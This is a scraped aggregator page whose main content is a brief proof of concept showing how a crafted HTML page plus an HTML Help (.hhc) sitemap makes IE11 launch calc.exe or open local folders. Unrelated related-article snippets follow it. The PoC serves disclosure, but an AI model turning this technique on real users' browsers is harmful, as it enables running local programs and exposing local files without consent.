Open any local folder/file in IE11 (and more) using MSHH

-------------------Poc.html------------------------
<OBJECT classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=100% height=100%>
 <PARAM name="Command" value="Index">
 <PARAM name="Item1" value="q.hhc">
</OBJECT>
---------------------------------------------------
--------------------q.hhc--------------------------
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
<OBJECT type="text/site properties">
<param name="Font" value="Sans,22,-2">
</OBJECT>
<UL>
    <LI> <OBJECT type="text/sitemap">
        <param name="Name" value="Open file">
        <param name="Local" value="C:\windows\system32\calc.exe">
        </OBJECT>
    <LI> <OBJECT type="text/sitemap">
        <param name="Name" value="redhead">
        </OBJECT>
    <LI> <OBJECT type="text/sitemap">
        <param name="Name" value="Open Website in Help">
        <param name="Local" value="http://www.leucosite.com">
        <param name="FrameName" value="red2">
        <param name="WindowName" value="red1">
        <param name="Comment" value="red3">
        </OBJECT>
    <LI> <OBJECT type="text/sitemap">
        <param name="Name" value="Open website in _self">
        <param name="Local" value="http://www.leucosite.com">
        </OBJECT>

    <LI> <OBJECT type="text/sitemap">
        <param name="Name" value="Open directory">
        <param name="Local" value="C:\">
        </OBJECT>
</UL>
</BODY></HTML>
时间: 2024-10-10 00:54:36

Open any local folder/file in IE11 (and more) using MSHH的相关文章

网页提示[Not allowed to load local resource: file://XXXX]错误

网页通过http 访问时, 点击打开文件的link.在Chrome 中会报 Not allowed to load local resource: file// XXXX 的错误 <!--Add by oscar999--> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE> New Document <

Chrome无法打开文件的错误 [Not allowed to load local resource: file://XXXX]

问题描述 <!--Add by oscar999--> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE> New Document </TITLE> <META NAME="Author" CONTENT="oscar999"> <scri

How to load a local .CSS file &amp; JavaScript resources using iPhone UIWebView Class

This post will cover the basic setup and creation of an application with web content for iPhone that will load local CSS files and some useful JavaScript functions. Most of these hints I found partially in different blogs and forums listed in the ref

SharePoint Client Add Folder,file to Library

public void UploadDocument(string siteURL, string documentListName, string documentListURL, string documentName, byte[] documentStream) { using (ClientContext clientContext = new ClientContext(siteURL)) { //Get Document List List documentsList = clie

Eclipse导入Gradle时报错:SDK location not found. Define location with sdk.dir in the local.properties file or with an ANDROID_HOME environment variable

百度查到http://stackoverflow.com/questions/19794200/gradle-android-and-the-android-home-sdk-location 按照其中的讲解设置了ANDROID_HOME环境变量为E:\android\adt-bundle-windows-x86_64-20131030\sdk 重启了Eclipse后终于正常工作了!

Mac OX 隐藏文件夹,文件,应用,磁盘的2种方法 hide finder folder, file, application, volume in 2 ways

经常需要主目录下隐藏一些文件夹之类的, 第一想到的当然就是:在要隐藏的文件夹前面加『.』(leading dot),这个用法当然可以的了 用习惯了Linux/GNU系统的,基本习惯使用这种办法 但是,我发现 Mac种/Users/$USER/目录下的Library就是隐藏的,但是并没有leading dot,说明 Mac种有除了leading dot之外的其他隐藏目录的方法 1.使用OnyX,这个是GUI形式的 [在Utilities->Visibility下面] 2.使用命令参数设置(对文件夹

Combine small files to Sequence file

Combine small files to sequence file or avro files are a good method to feed hadoop. Small files in hadoop will take more namenode memory resource. SequenceFileInputFormat 是一种Key value 格式的文件格式. Key和Value的类型可以自己实现其序列化和反序列化内容. 以下的代码仅供参考作用,真实的项目中使用的时候,可

What is the AppData folder?

最近一直在纠结软件中用户配置信息以及数据库存放位置问题,winxp系统以前不存在UAC重定向问题,但是自从Win7系统以后就发现没有管理员权限时,安装在系统盘中的软件配置信息若需要读写操作时,系统会自动将这些配置文件和数据库重定向到当前用户的AppData\Local\VirtualStore目录中,虽然避免了系统报错问题,但是对于软件调试以及用户配置文件的修改造成了困扰. 以下是微软官方给出的AppData的定义(虽然显示的为win8系统,但是个人认为对win7和win10都通用): Appl

FTP Download File By Some Order List

@Echo Off REM -- Define File Filter, i.e. files with extension .RBSet FindStrArgs=/E /C:".asp" REM -- Extract Ftp Script to create List of FilesSet "FtpCommand=ls"Call:extractFileSection "[Ftp Script 1]" "-">&quo